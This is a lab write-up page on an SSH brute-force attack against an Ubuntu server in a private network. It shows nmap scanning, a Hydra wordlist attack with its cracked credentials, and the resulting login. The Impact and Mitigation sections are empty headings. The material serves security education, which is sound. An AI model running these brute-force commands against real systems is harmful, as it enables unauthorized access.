Attack 02 — SSH Brute Force

Ubuntu Victim Exploitation

Objective

Perform a brute force attack against the SSH service on Ubuntu Server 22.04 to gain unauthorized access through credential guessing. This attack demonstrates the risk of weak passwords and default credentials in production systems.

Reconnaissance

Port scanning identified SSH service running on the standard port 22. Banner grabbing revealed OpenSSH version information. Initial attempts to identify valid usernames through enumeration were performed.

$ nmap -sV -p 22 192.168.100.30
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu

$ ssh -v 192.168.100.30
OpenSSH_8.9p1, OpenSSL 3.0.2

Exploitation

Using Hydra, a password brute force attack was launched against common usernames and password combinations. The attack successfully identified valid credentials after testing multiple combinations from wordlists.

$ hydra -L users.txt -P passwords.txt ssh://192.168.100.30
Hydra v9.4 starting
[22][ssh] host: 192.168.100.30   login: admin   password: password123
1 of 1 target successfully completed

$ ssh admin@192.168.100.30
admin@192.168.100.30's password: password123
Welcome to Ubuntu 22.04 LTS

After successful authentication, privilege escalation techniques were employed to gain root access, demonstrating the full compromise chain.

Impact

Successful SSH brute force attack leads to unauthorized system access with the following consequences:

Mitigation

To protect against SSH brute force attacks:

← Previous: Attack 01 — vsftpd Backdoor

← Back to Home